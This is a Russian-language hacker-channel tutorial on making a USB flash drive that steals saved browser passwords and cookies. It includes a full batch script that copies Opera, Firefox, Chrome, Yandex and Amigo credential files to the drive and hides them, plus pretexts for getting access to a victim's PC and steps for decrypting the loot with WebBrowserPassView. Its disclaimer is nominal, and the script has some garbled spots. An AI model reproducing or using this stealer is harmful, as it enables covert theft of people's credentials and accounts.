Делаем флэшку для кражи паролей
X@kerHalom
Дисклеймер: Статья предоставлена в ознакомительных целях! Мы не побуждаем повторять все действия. Ни создатель, ни телеграмм канал ответственности за вас не несёт!
Halom сегодня мы будем делать флэшку-стилер не много слов
Стиллер ворует cookie с браузера и с помощью специальной программы расшифровывает их. На выходе вы получаете готовые пароли. Для тех кто в бункере: сookie-файлы – зашифрованные текстовые документы, в которых хранится основная информация о пользователе, который юзает браузер. В эту информацию входит статистика использования браузера, персональные настройки, сохранённые логины и пароли, а также многое другое.
Плюсы и минусы способа
Минусы:
- Есть смысл стиллить куки только тогда, когда вы уверены, что жертва сохраняет пароли в браузере.
- Несовместимость с WINDOWS 10, и последними версиями семёрки
Плюсы:
- Метод не палится антивирусом.
- Кто бы что ни говорил, а человека взломать легче, чем компьютер. Предлогов может быть море. Попросить друга прийти к нему с флешкой, и скачать музыку и тд.
НУ А ТЕПЕРЬ К ДЕЛУ
Создаём на флешке 2 текстовых файла. Первый называем “autorun.inf” а второй – “stealer.bat” *.bat - исполняемое расширение файла. Т.е. его можно использовать как программку*
В первый прописываем такие строчки:
Первый файл отвечает за автозапуск стиллера. Второй - непосредственно сам стиллер. Его следует наполнить такими строчками:
@echo off md %~d0\Mozilla md %~d0\0pera md %~d0\Google md %~d0\Yandex md %~d0\Amigo CD/D %APPDATA%\Opera\Opera\ cls copy /y wand.dat %~d0\Opera\ copy /y cookies.dat %~d0\Opera\ cd %AppData%\Mozilla\Firefox\Profiles\*.default copy /y cookies.sqlite %~d0\Mozilla copy /y key3.db %~d0\Mozilla copy /y signons.sqlite %~d0\Mozilla copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla cd %localappdata%\Google\Chrome\User Data\Default cls copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google" cd %localappdata%\Yandex\YandexBrowser\User Data\Default copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex" cd %localappdata%\Amigo\User Data\Default copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo" cls ATTRIB -R -A -S -H attrib +h %~d0\Mozilla attrib +h %~d0\Opera attrib +h %~d0\Google attrib +h %~d0\Yandex attrib +h %~d0\Amigo attrib +h %~d0\search.bat attrib +h %~d0\new attrib +h %~d0\autorun.inf del: autorun.inf?
После этого "скрываем" получившиеся файлы, и можем идти стиллить пароли и после того, как операция выполнена успешно - возвращаемся домой, через "Панель управления->Оформление и персонализация->Показ скрытых папок и файлов" отображаем скрытые на флешке файлы.
Свои куки на СВОЁМ компьютере удаляем, или скидываем на флешку. А на их место копируем полученные.
Теперь Скачиваем WebBrowserPassView. Лично я использовал портативную версию. В этой программе уже ничего не надо нажимать - она сама загрузит и расшифрует куки из ваших браузеров. Напоминаю, не забудьте заменить свои файлы на полученные!
Возвращаясь к минусам, описанным выше следует решить какой способ стиллинга использовать. Если у жертвы стоит последняя версия винды семёрки, или вообще десятка, тогда стиллинг лучше всего осуществлять вручную. То есть надо прийти к жертве домой, естественно заранее придумав предлог, подключить флешку к ПК, и запустить батник вручную.
А на этом всё, автор Nirix специально для X@ker.
Как всегда, не забывайте ставить лайки и подписываться на канал, вступайте в Наш чат, всем спасибо за внимание Пока!